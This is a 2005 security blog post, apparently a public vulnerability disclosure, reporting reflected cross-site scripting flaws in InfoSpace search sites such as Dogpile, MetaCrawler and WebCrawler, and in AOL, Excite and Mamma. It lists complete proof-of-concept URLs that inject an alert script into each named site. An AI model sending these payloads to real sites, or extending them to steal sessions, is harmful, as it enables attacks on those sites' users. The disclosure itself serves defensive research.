by r0t,der4444,cembo,VietMafia

Thursday, December 01, 2005

InfoSpace® search engines XSS vuln.




InfoSpace search engines are vuln. to XSS attacks.

Vuln. dicovered by : r0t
Date: 1 dec. 2005
Vendor:http://www.infospaceinc.com/
affected version: latest:) There is more than 3 types of search engines and all of them ar vuln.

About Products:
InfoSpace is one of the leading online directory services providers on the Internet. Our award-winning directory sites include Switchboard® and InfoSpace®. Our online yellow page sites are designed to make it easier for users to locate businesses, people and information online, while creating optimal revenue opportunities for advertisers and listings partners, such as Verizon SuperPages, BellSouth, and Dex Media.

InfoSpace's online directory products are uniquely structured and highly interactive to help users quickly and easily locate businesses that satisfy their needs. Besides yellow page listings, they offer a variety of other useful services, including white pages, maps and directions, public records, and more.

InfoSpace's metasearch technology searches the most popular engines including Google, Yahoo!, MSN Search, Ask Jeeves and more, and returns the best results from each.

Metasearch
InfoSpace's branded search sites Dogpile®, WebCrawler®, MetaCrawler® and WebFetch™ make it easy to search more of the Web and find relevant results fast.

By combining the relevancy weightings of multiple engines, InfoSpace metasearch returns the best results the Web has to offer, providing users with a more powerful and comprehensive way to search. In short, metasearch allows users to search up to 50% more of the Web than any single engine.

Because metasearch aggregates results including paid advertising from several sources, each of InfoSpace's branded search sites are better able to monetize search than any single search engine.



Vuln. Description:

InfoSpace search engine parameters isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.


Example of InfoSpace Search engines:

http://msxml.webcrawler.com/info.wbcrwl/search/
web/%253Cscript%253Ealert(%2527r0t%252Blloves%2
52BXSS%2527)%253C%252Fscript253E/1/-/1/-/-/-/-/
-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-
/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/417/
top

http://www.metacrawler.com/info.metac/search/web
/%253Cscript%253Ealert(%2527r0t%2Blloves%2BXSS%2
527)%253C%252Fscript253E/1/-/1/-/-/-/-/-/-/-/-/-
/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-
/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/417/top

http://www.dogpile.com/info.dogpl/search/web/%253
Cscript%253Ealert(%2527r0t%252Blloves%252BXSS%252
7)%253C%252Fscript%253E/1/-/1/-/-/-/-/-/-/-/-/-/-
/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/
-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/417/top

http://www.webfetch.com/uk.webfetch/search/web/%2
53Cscript%253Ealert(%2527r0t%2Blloves%2BXSS%2527)
%253C%252Fscript%253E/1/-/1/-/-/-/-/-/-/-/-/-/-/-/
-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/
-/-/-/-/-/-/-/-/-/-/-/-/-/417/top?engineset=uk-onl
y_oando



http://www.switchboard.com/bin/cgiqa.dll?SR=&MEM=1
&QV=24F925BAB8114FE185F3F69AD09FD7A0l02811611743C8
74343313203O01811711743C87434D313203O03872D3DA93C8
74316303203&LNK=14%3A21&F=&L=%3Cscript%3Ealert%28%
27r0t+love+XSS%27%29%3C%2Fscript%3E&T=&S=&Z=&image
1.x=24&image1.y=9


Example in AOL:

http://whitepages.aol.com/_1_2LJMU7R09YLVHU__aolwp.aolw/
white-pages/noresults.htm?kcfg=wpus&otmpl=%2Fwhite-pages
%2Fresults.htm&qfm=n&qk=5&top=internal&qname=%3Cscript%3
Ealert%28%27r0t%2Blove%2BXSS%27%29%3C%2Fscript%3E&qs=&se
archtype=citystate&qn=%3Cscript%3Ealert('r0t+love+XSS')
%3C/script%3E&qf=&qc=

Example on Excite.com
http://msxml.excite.com/info.xcite/search/web/%253Cscript
%253Ealert(%2527r0t%2Blloves%2BXSS%2527)%253C%252Fscript%
253E

Other examples:
http://www.webmarket.com/info.webmkt/results.htm?qkw=%3Cs
cript%3Ealert%28%27r0t%2Blloves%2BXSS%27%29%3C%2Fscript%3E

http://www.classifieds2000.com/_1_W1U7R0GZW8ML__info.cls2k
/classads/results.htm?qkw=%3Cscript%3Ealert%28%27r0t%2Bllo
ves%2BXSS%27%29%3C%2Fscript%3E

http://msxml.infospace.com/_1_2N6MU7R09I3ROK__info.nbci/se
arch/web/%253Cscript%253Ealert(%2527r0t%2Blloves%2BXSS%252
7)%253C%252Fscript%253E



Even Mamma.com is only a partner of InfoSpace, and it aslo have same vuln. type.

example:

http://www.mamma.com/Mamma?qtype=&query=%3Cscript%3
Ealert%28%27r0t+llove+XSS%27%29%3C%2Fscript%3E


Solution:
Edit the source code to ensure that input is properly sanitised.

1 Comments:

Anonymous w00t told...

great found!

1:01 PM

 

Post a Comment

<< Home

 
Copyright (c) 2006 Pridels Sec Crew